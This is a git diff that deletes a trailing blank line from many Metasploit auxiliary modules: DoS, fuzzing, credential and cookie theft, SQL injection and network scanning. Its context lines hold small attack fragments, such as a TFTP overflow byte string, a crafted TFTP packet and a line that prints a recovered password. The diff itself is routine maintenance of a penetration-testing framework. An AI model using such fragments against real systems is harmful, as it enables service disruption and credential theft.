a/modules/auxiliary/dos/http/apache_mod_isapi.rb b/modules/auxiliary/dos/http/apache_mod_isapi.rb index c30e4d5897..edfa52f189 100644 --- a/modules/auxiliary/dos/http/apache_mod_isapi.rb +++ b/modules/auxiliary/dos/http/apache_mod_isapi.rb @@ -90,5 +90,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end - end diff --git a/modules/auxiliary/dos/http/dell_openmanage_post.rb b/modules/auxiliary/dos/http/dell_openmanage_post.rb index 941c4390b3..5029fc3db2 100644 --- a/modules/auxiliary/dos/http/dell_openmanage_post.rb +++ b/modules/auxiliary/dos/http/dell_openmanage_post.rb @@ -50,5 +50,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end - end diff --git a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb index 72de249335..528c9e8e6a 100644 --- a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb +++ b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb @@ -56,5 +56,4 @@ class MetasploitModule < Msf::Auxiliary close_pcap end - end diff --git a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb index a312e2fdd6..83a41f1556 100644 --- a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb +++ b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb @@ -73,5 +73,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end - end diff --git a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb index af688376d4..a137b86145 100644 --- a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb +++ b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb @@ -75,5 +75,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end - end diff --git a/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb b/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb index 7057a5ee02..4bc015208e 100644 --- a/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb +++ b/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb @@ -121,5 +121,4 @@ class MetasploitModule < Msf::Auxiliary disconnect() end end - end diff --git a/modules/auxiliary/dos/scada/d20_tftp_overflow.rb b/modules/auxiliary/dos/scada/d20_tftp_overflow.rb index 2770b4d07e..1772bc750d 100644 --- a/modules/auxiliary/dos/scada/d20_tftp_overflow.rb +++ b/modules/auxiliary/dos/scada/d20_tftp_overflow.rb @@ -132,5 +132,4 @@ class MetasploitModule < Msf::Auxiliary "\x80\x80\x81\xFA\x80\x80\x81\xFB\x80\x80\x81\xFC\x80\x80\x81\xFD\x80\x80\x81\xFE" + "\x80\x80\x82\x80\x80\x80\x82\x81" end - end diff --git a/modules/auxiliary/dos/scada/yokogawa_logsvr.rb b/modules/auxiliary/dos/scada/yokogawa_logsvr.rb index 7100ddf509..161d87c5c5 100644 --- a/modules/auxiliary/dos/scada/yokogawa_logsvr.rb +++ b/modules/auxiliary/dos/scada/yokogawa_logsvr.rb @@ -69,5 +69,4 @@ class MetasploitModule < Msf::Auxiliary disconnect_udp end - end diff --git a/modules/auxiliary/dos/smtp/sendmail_prescan.rb b/modules/auxiliary/dos/smtp/sendmail_prescan.rb index 11bfe61d69..e34093c68f 100644 --- a/modules/auxiliary/dos/smtp/sendmail_prescan.rb +++ b/modules/auxiliary/dos/smtp/sendmail_prescan.rb @@ -51,7 +51,6 @@ class MetasploitModule < Msf::Auxiliary end end - end =begin diff --git a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb index e6c2ec69fb..004d9a7b9a 100644 --- a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb +++ b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb @@ -100,5 +100,4 @@ class MetasploitModule < Msf::Auxiliary print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length)) return true end - end diff --git a/modules/auxiliary/dos/windows/appian/appian_bpm.rb b/modules/auxiliary/dos/windows/appian/appian_bpm.rb index 344a888478..062d36e61e 100644 --- a/modules/auxiliary/dos/windows/appian/appian_bpm.rb +++ b/modules/auxiliary/dos/windows/appian/appian_bpm.rb @@ -87,5 +87,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end - end diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb index ebd94faefc..36b341b72d 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb @@ -39,5 +39,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end end - end diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb index dc90911428..495d350326 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb @@ -47,5 +47,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end - end diff --git a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb index 588b62dc36..631356681c 100644 --- a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb +++ b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb @@ -64,7 +64,6 @@ class MetasploitModule < Msf::Auxiliary disconnect rescue ::Rex::ConnectionError end - end =begin diff --git a/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb b/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb index 64ffc1764f..122d3d3689 100644 --- a/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb +++ b/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb @@ -112,5 +112,4 @@ class MetasploitModule < Msf::Auxiliary ret = [ ret, data ] ret end - end diff --git a/modules/auxiliary/dos/windows/ftp/solarftp_user.rb b/modules/auxiliary/dos/windows/ftp/solarftp_user.rb index cc3e24e25e..5968ce3218 100644 --- a/modules/auxiliary/dos/windows/ftp/solarftp_user.rb +++ b/modules/auxiliary/dos/windows/ftp/solarftp_user.rb @@ -48,5 +48,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end - end diff --git a/modules/auxiliary/dos/windows/games/kaillera.rb b/modules/auxiliary/dos/windows/games/kaillera.rb index ae3b337eb1..3ecb2b1d8e 100644 --- a/modules/auxiliary/dos/windows/games/kaillera.rb +++ b/modules/auxiliary/dos/windows/games/kaillera.rb @@ -56,5 +56,4 @@ class MetasploitModule < Msf::Auxiliary print_good("Target is down") end end - end diff --git a/modules/auxiliary/dos/windows/nat/nat_helper.rb b/modules/auxiliary/dos/windows/nat/nat_helper.rb index 9096028d7f..cab5599936 100644 --- a/modules/auxiliary/dos/windows/nat/nat_helper.rb +++ b/modules/auxiliary/dos/windows/nat/nat_helper.rb @@ -43,5 +43,4 @@ class MetasploitModule < Msf::Auxiliary disconnect_udp end - end diff --git a/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb b/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb index fe14ca95f2..4e5d1522dc 100644 --- a/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb +++ b/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb @@ -163,5 +163,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb index 9185588b90..2ed092e859 100644 --- a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb +++ b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb @@ -102,5 +102,4 @@ long function_0a ( disconnect end - end diff --git a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb index b07c39a84c..90f6ef055f 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb @@ -90,5 +90,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end - end diff --git a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb index 515fc70115..bb315d7fba 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb @@ -58,5 +58,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end - end diff --git a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb index d5d93cfdb6..827a2fdaab 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb @@ -114,5 +114,4 @@ class MetasploitModule < Msf::Auxiliary j=j-10000 end end - end diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb index 5d289b3998..4901e7fb80 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb @@ -66,7 +66,6 @@ class MetasploitModule < Msf::Auxiliary disconnect() end - end =begin diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb index bd7d4f2be6..ee0d113050 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb @@ -60,7 +60,6 @@ class MetasploitModule < Msf::Auxiliary disconnect end - end =begin diff --git a/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb b/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb index a4b753adbb..41142ffec5 100644 --- a/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb +++ b/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb @@ -110,5 +110,4 @@ class MetasploitModule < Msf::Auxiliary select(nil, nil, nil, 0.5) end - end diff --git a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb index 7541a1c3ed..fdde3cb4e5 100644 --- a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb +++ b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb @@ -169,5 +169,4 @@ class MetasploitModule < Msf::Auxiliary ret << svc ret end - end diff --git a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb index c1ca3c06c5..70c6866ac3 100644 --- a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb +++ b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb @@ -70,5 +70,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end - end diff --git a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb index e9b5c27bb0..f8e2d0ae99 100644 --- a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb +++ b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb @@ -107,5 +107,4 @@ class MetasploitModule < Msf::Auxiliary print "<< " + (sock.get_once || '') disconnect end - end diff --git a/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb b/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb index 64863354ad..c751c3c3e9 100644 --- a/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb +++ b/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb @@ -74,5 +74,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end - end diff --git a/modules/auxiliary/dos/windows/tftp/solarwinds.rb b/modules/auxiliary/dos/windows/tftp/solarwinds.rb index a6900c18d4..ae997facdb 100644 --- a/modules/auxiliary/dos/windows/tftp/solarwinds.rb +++ b/modules/auxiliary/dos/windows/tftp/solarwinds.rb @@ -35,5 +35,4 @@ class MetasploitModule < Msf::Auxiliary udp_sock.put("\x00\x01\x01\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00") disconnect_udp end - end diff --git a/modules/auxiliary/dos/wireshark/ldap.rb b/modules/auxiliary/dos/wireshark/ldap.rb index d21f085046..1009867ff4 100644 --- a/modules/auxiliary/dos/wireshark/ldap.rb +++ b/modules/auxiliary/dos/wireshark/ldap.rb @@ -54,5 +54,4 @@ class MetasploitModule < Msf::Auxiliary close_pcap end - end diff --git a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb index 7716f0b0e5..bd753aef9e 100644 --- a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb +++ b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb @@ -250,5 +250,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb b/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb index ecb6ce8444..dc3e83646c 100644 --- a/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb +++ b/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb @@ -152,5 +152,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/gather/advantech_webaccess_creds.rb b/modules/auxiliary/gather/advantech_webaccess_creds.rb index 832d1819a0..b3fefbcc84 100644 --- a/modules/auxiliary/gather/advantech_webaccess_creds.rb +++ b/modules/auxiliary/gather/advantech_webaccess_creds.rb @@ -168,5 +168,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/gather/alienvault_iso27001_sqli.rb b/modules/auxiliary/gather/alienvault_iso27001_sqli.rb index 875f0b718e..15466154e4 100644 --- a/modules/auxiliary/gather/alienvault_iso27001_sqli.rb +++ b/modules/auxiliary/gather/alienvault_iso27001_sqli.rb @@ -144,6 +144,5 @@ class MetasploitModule < Msf::Auxiliary return nil end end - end diff --git a/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb b/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb index 72bd3bbf42..2c722a6d5f 100644 --- a/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb +++ b/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb @@ -156,5 +156,4 @@ class MetasploitModule < Msf::Auxiliary return nil end end - end diff --git a/modules/auxiliary/gather/android_browser_file_theft.rb b/modules/auxiliary/gather/android_browser_file_theft.rb index 12efede57e..00cdc47ace 100644 --- a/modules/auxiliary/gather/android_browser_file_theft.rb +++ b/modules/auxiliary/gather/android_browser_file_theft.rb @@ -177,5 +177,4 @@ class MetasploitModule < Msf::Auxiliary def hex2bin(hex) hex.chars.each_slice(2).map(&:join).map { |c| c.to_i(16) }.map(&:chr).join end - end diff --git a/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb b/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb index e573118136..2a5d5f97d1 100644 --- a/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb +++ b/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb @@ -137,5 +137,4 @@ class MetasploitModule < Msf::Auxiliary def per_run_token @token ||= Rex::Text.rand_text_alpha(rand(2)+1) end - end diff --git a/modules/auxiliary/gather/android_htmlfileprovider.rb b/modules/auxiliary/gather/android_htmlfileprovider.rb index c0b2acfa1a..da887057c8 100644 --- a/modules/auxiliary/gather/android_htmlfileprovider.rb +++ b/modules/auxiliary/gather/android_htmlfileprovider.rb @@ -174,5 +174,4 @@ EOS def run exploit() end - end diff --git a/modules/auxiliary/gather/android_object_tag_webview_uxss.rb b/modules/auxiliary/gather/android_object_tag_webview_uxss.rb index 75a8e11649..ab7fb2f934 100644 --- a/modules/auxiliary/gather/android_object_tag_webview_uxss.rb +++ b/modules/auxiliary/gather/android_object_tag_webview_uxss.rb @@ -141,5 +141,4 @@ class MetasploitModule < Msf::Auxiliary def run exploit end - end diff --git a/modules/auxiliary/gather/android_stock_browser_uxss.rb b/modules/auxiliary/gather/android_stock_browser_uxss.rb index 4421fcde24..fc5b6de637 100644 --- a/modules/auxiliary/gather/android_stock_browser_uxss.rb +++ b/modules/auxiliary/gather/android_stock_browser_uxss.rb @@ -233,5 +233,4 @@ class MetasploitModule < Msf::Auxiliary def run exploit end - end diff --git a/modules/auxiliary/gather/apache_rave_creds.rb b/modules/auxiliary/gather/apache_rave_creds.rb index 3dd1bbfeae..0981a816a8 100644 --- a/modules/auxiliary/gather/apache_rave_creds.rb +++ b/modules/auxiliary/gather/apache_rave_creds.rb @@ -227,5 +227,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb b/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb index 90c184046d..c4e3b6c90e 100644 --- a/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb +++ b/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb @@ -255,5 +255,4 @@ class MetasploitModule < Msf::Auxiliary def grab_key @grab_key ||= Rex::Text.rand_text_alphanumeric(8) end - end diff --git a/modules/auxiliary/gather/browser_info.rb b/modules/auxiliary/gather/browser_info.rb index 8b3741681e..f0add1bf09 100644 --- a/modules/auxiliary/gather/browser_info.rb +++ b/modules/auxiliary/gather/browser_info.rb @@ -79,5 +79,4 @@ class MetasploitModule < Msf::Auxiliary def run exploit end - end diff --git a/modules/auxiliary/gather/checkpoint_hostname.rb b/modules/auxiliary/gather/checkpoint_hostname.rb index baafe1cd4e..95ed3478de 100644 --- a/modules/auxiliary/gather/checkpoint_hostname.rb +++ b/modules/auxiliary/gather/checkpoint_hostname.rb @@ -90,5 +90,4 @@ class MetasploitModule < Msf::Auxiliary } report_service(svc_info) end - end diff --git a/modules/auxiliary/gather/citrix_published_applications.rb b/modules/auxiliary/gather/citrix_published_applications.rb index e53ba06bed..41d2825157 100644 --- a/modules/auxiliary/gather/citrix_published_applications.rb +++ b/modules/auxiliary/gather/citrix_published_applications.rb @@ -70,5 +70,4 @@ class MetasploitModule < Msf::Auxiliary disconnect_udp end - end diff --git a/modules/auxiliary/gather/citrix_published_bruteforce.rb b/modules/auxiliary/gather/citrix_published_bruteforce.rb index 297f37c5c7..b325b7ca2e 100644 --- a/modules/auxiliary/gather/citrix_published_bruteforce.rb +++ b/modules/auxiliary/gather/citrix_published_bruteforce.rb @@ -176,5 +176,4 @@ class MetasploitModule < Msf::Auxiliary disconnect_udp end - end diff --git a/modules/auxiliary/gather/corpwatch_lookup_id.rb b/modules/auxiliary/gather/corpwatch_lookup_id.rb index 209334c430..e889fd1723 100644 --- a/modules/auxiliary/gather/corpwatch_lookup_id.rb +++ b/modules/auxiliary/gather/corpwatch_lookup_id.rb @@ -535,5 +535,4 @@ class MetasploitModule < Msf::Auxiliary e.get_elements(name)[0].get_text ) ? e.get_elements(name)[0].get_text.to_s : "" end - end diff --git a/modules/auxiliary/gather/corpwatch_lookup_name.rb b/modules/auxiliary/gather/corpwatch_lookup_name.rb index e60f431c04..4d514d0ba7 100644 --- a/modules/auxiliary/gather/corpwatch_lookup_name.rb +++ b/modules/auxiliary/gather/corpwatch_lookup_name.rb @@ -129,5 +129,4 @@ class MetasploitModule < Msf::Auxiliary e.get_elements(name)[0].get_text ) ? e.get_elements(name)[0].get_text.to_s : "" end - end diff --git a/modules/auxiliary/gather/external_ip.rb b/modules/auxiliary/gather/external_ip.rb index 9926b1ce5c..f283d859ca 100644 --- a/modules/auxiliary/gather/external_ip.rb +++ b/modules/auxiliary/gather/external_ip.rb @@ -48,5 +48,4 @@ end report_host(our_addr) if datastore['REPORT_HOST'] end end - end diff --git a/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb b/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb index 5cbb689dff..7f994e9e1d 100644 --- a/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb +++ b/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb @@ -195,5 +195,4 @@ class MetasploitModule < Msf::Auxiliary def rhost URI.parse(datastore["JSONP_URL"]).host end - end diff --git a/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb b/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb index f36b7fc006..c7673de74b 100644 --- a/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb +++ b/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb @@ -304,5 +304,4 @@ class MetasploitModule < Msf::Auxiliary print_error("No users discovered") end end - end diff --git a/modules/auxiliary/gather/ibm_sametime_room_brute.rb b/modules/auxiliary/gather/ibm_sametime_room_brute.rb index 8645626e4c..beddef0265 100644 --- a/modules/auxiliary/gather/ibm_sametime_room_brute.rb +++ b/modules/auxiliary/gather/ibm_sametime_room_brute.rb @@ -189,5 +189,4 @@ class MetasploitModule < Msf::Auxiliary print_good(roomtbl.to_s) end - end diff --git a/modules/auxiliary/gather/ibm_sametime_version.rb b/modules/auxiliary/gather/ibm_sametime_version.rb index 4811af02ad..133ff053e8 100644 --- a/modules/auxiliary/gather/ibm_sametime_version.rb +++ b/modules/auxiliary/gather/ibm_sametime_version.rb @@ -321,5 +321,4 @@ class MetasploitModule < Msf::Auxiliary report unless @version_info.empty? end - end diff --git a/modules/auxiliary/gather/ie_uxss_injection.rb b/modules/auxiliary/gather/ie_uxss_injection.rb index 479d1ea070..3bd4dff636 100644 --- a/modules/auxiliary/gather/ie_uxss_injection.rb +++ b/modules/auxiliary/gather/ie_uxss_injection.rb @@ -149,5 +149,4 @@ class MetasploitModule < Msf::Auxiliary send_response(cli, get_html) end end - end diff --git a/modules/auxiliary/gather/jenkins_cred_recovery.rb b/modules/auxiliary/gather/jenkins_cred_recovery.rb index 2e6c92fa03..2e2f55e38c 100644 --- a/modules/auxiliary/gather/jenkins_cred_recovery.rb +++ b/modules/auxiliary/gather/jenkins_cred_recovery.rb @@ -289,5 +289,4 @@ class MetasploitModule < Msf::Auxiliary def print_error(msg='') super("#{peer} - #{msg}") end - end diff --git a/modules/auxiliary/gather/joomla_contenthistory_sqli.rb b/modules/auxiliary/gather/joomla_contenthistory_sqli.rb index 4af07bf02a..576398df28 100644 --- a/modules/auxiliary/gather/joomla_contenthistory_sqli.rb +++ b/modules/auxiliary/gather/joomla_contenthistory_sqli.rb @@ -203,5 +203,4 @@ class MetasploitModule < Msf::Auxiliary } ) end - end diff --git a/modules/auxiliary/gather/mantisbt_admin_sqli.rb b/modules/auxiliary/gather/mantisbt_admin_sqli.rb index a5853703ac..2dc8b64acf 100644 --- a/modules/auxiliary/gather/mantisbt_admin_sqli.rb +++ b/modules/auxiliary/gather/mantisbt_admin_sqli.rb @@ -96,5 +96,4 @@ class MetasploitModule < Msf::Auxiliary print_good("File saved to: #{path}") end end - end diff --git a/modules/auxiliary/gather/mcafee_epo_xxe.rb b/modules/auxiliary/gather/mcafee_epo_xxe.rb index 1aa8da7a60..c6d24d2f7d 100644 --- a/modules/auxiliary/gather/mcafee_epo_xxe.rb +++ b/modules/auxiliary/gather/mcafee_epo_xxe.rb @@ -253,5 +253,4 @@ class MetasploitModule < Msf::Auxiliary print_good("The decrypted password for the keystore, 'sa' SQL user (if using local instance), and possibly 'admin' is: #{passphrase}") end - end diff --git a/modules/auxiliary/gather/ms14_052_xmldom.rb b/modules/auxiliary/gather/ms14_052_xmldom.rb index 5b343b1b51..9f49f07f33 100644 --- a/modules/auxiliary/gather/ms14_052_xmldom.rb +++ b/modules/auxiliary/gather/ms14_052_xmldom.rb @@ -215,5 +215,4 @@ class MetasploitModule < Msf::Auxiliary send_response(cli, html) end end - end diff --git a/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb b/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb index 2e4425d4de..7e215d17da 100644 --- a/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb +++ b/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb @@ -204,5 +204,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/gather/safari_file_url_navigation.rb b/modules/auxiliary/gather/safari_file_url_navigation.rb index 01b8aefb8f..1febe02732 100644 --- a/modules/auxiliary/gather/safari_file_url_navigation.rb +++ b/modules/auxiliary/gather/safari_file_url_navigation.rb @@ -340,5 +340,4 @@ class MetasploitModule < Msf::Auxiliary rescue end end - end diff --git a/modules/auxiliary/gather/windows_deployment_services_shares.rb b/modules/auxiliary/gather/windows_deployment_services_shares.rb index 0b883b4bae..49fa8e9944 100644 --- a/modules/auxiliary/gather/windows_deployment_services_shares.rb +++ b/modules/auxiliary/gather/windows_deployment_services_shares.rb @@ -249,6 +249,5 @@ class MetasploitModule < Msf::Auxiliary proof: domain ) end - end diff --git a/modules/auxiliary/pdf/foxit/authbypass.rb b/modules/auxiliary/pdf/foxit/authbypass.rb index 76b48dc177..896cd5535a 100644 --- a/modules/auxiliary/pdf/foxit/authbypass.rb +++ b/modules/auxiliary/pdf/foxit/authbypass.rb @@ -110,5 +110,4 @@ class MetasploitModule < Msf::Auxiliary pdf << "%%EOF" << eol end - end diff --git a/modules/auxiliary/scanner/db2/db2_auth.rb b/modules/auxiliary/scanner/db2/db2_auth.rb index 278b797c7e..62526e90af 100644 --- a/modules/auxiliary/scanner/db2/db2_auth.rb +++ b/modules/auxiliary/scanner/db2/db2_auth.rb @@ -90,5 +90,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/scanner/dcerpc/management.rb b/modules/auxiliary/scanner/dcerpc/management.rb index bcb50dea01..2fc09d3077 100644 --- a/modules/auxiliary/scanner/dcerpc/management.rb +++ b/modules/auxiliary/scanner/dcerpc/management.rb @@ -84,5 +84,4 @@ class MetasploitModule < Msf::Auxiliary print_error("Error: #{e}") end end - end diff --git a/modules/auxiliary/scanner/discovery/arp_sweep.rb b/modules/auxiliary/scanner/discovery/arp_sweep.rb index 8e40cb49a8..3edd308a9f 100644 --- a/modules/auxiliary/scanner/discovery/arp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/arp_sweep.rb @@ -109,5 +109,4 @@ class MetasploitModule < Msf::Auxiliary return unless pkt.arp_opcode == 2 pkt end - end diff --git a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb index cac7ab960a..54ff519d05 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb @@ -98,5 +98,4 @@ class MetasploitModule < Msf::Auxiliary # Close capture close_pcap() end - end diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb index 59e5416773..1ac5dd0a09 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb @@ -213,5 +213,4 @@ class MetasploitModule < Msf::Auxiliary return unless p.payload[0,2] == "\x88\x00" p end - end diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb index f1f6787468..46d2aafe7c 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb @@ -188,5 +188,4 @@ class MetasploitModule < Msf::Auxiliary # Close capture close_pcap() end - end diff --git a/modules/auxiliary/scanner/discovery/udp_probe.rb b/modules/auxiliary/scanner/discovery/udp_probe.rb index d0b1113202..abb929179b 100644 --- a/modules/auxiliary/scanner/discovery/udp_probe.rb +++ b/modules/auxiliary/scanner/discovery/udp_probe.rb @@ -532,5 +532,4 @@ class MetasploitModule < Msf::Auxiliary def probe_pkt_pca_nq(ip) return ["NQ", 5632] end - end diff --git a/modules/auxiliary/scanner/discovery/udp_sweep.rb b/modules/auxiliary/scanner/discovery/udp_sweep.rb index 616d790af8..19c0c87af8 100644 --- a/modules/auxiliary/scanner/discovery/udp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/udp_sweep.rb @@ -488,5 +488,4 @@ class MetasploitModule < Msf::Auxiliary def probe_pkt_pca_nq(ip) return ["NQ", 5632] end - end diff --git a/modules/auxiliary/scanner/elasticsearch/indices_enum.rb b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb index d093f0d6dd..fa78719e12 100644 --- a/modules/auxiliary/scanner/elasticsearch/indices_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb @@ -78,5 +78,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/scanner/finger/finger_users.rb b/modules/auxiliary/scanner/finger/finger_users.rb index e8594bc21a..829e0e45b3 100644 --- a/modules/auxiliary/scanner/finger/finger_users.rb +++ b/modules/auxiliary/scanner/finger/finger_users.rb @@ -196,5 +196,4 @@ class MetasploitModule < Msf::Auxiliary end return true end - end diff --git 